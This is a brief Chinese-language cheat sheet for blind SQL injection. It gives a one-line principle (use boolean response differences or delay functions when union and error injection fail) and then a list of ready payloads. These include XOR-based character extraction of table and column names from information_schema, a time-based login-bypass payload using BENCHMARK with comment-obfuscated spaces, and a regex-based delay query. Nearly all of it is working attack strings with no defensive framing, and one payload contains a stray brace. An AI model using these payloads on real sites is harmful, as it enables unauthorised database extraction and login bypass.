0x01[漏洞原理]

  • 当页面无法使用联合注入和报错注入的时候利用回显正常与否或者使用能造成延时的函数进行注入判断

0x02[Payload]

id=1^(ord(substr((select(group_concat(xxx))from(xxx)),{},1))={})

id=1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))>1})

id=1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='xxx')),{},1))>1)

username=admin&password=or/**/if(mid(group_concat(mid((Select/**/group_concat(a)/**/from(Select/**/1/**/as/**/a/**/union/**/Select*from/**/users)n),1,1)),1,1)/**/like/**/'a',(Select/**/Benchmark(100000000,md5(5)),1))#

(Select/**/Benchmark(100000000,md5(5)),1)

select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');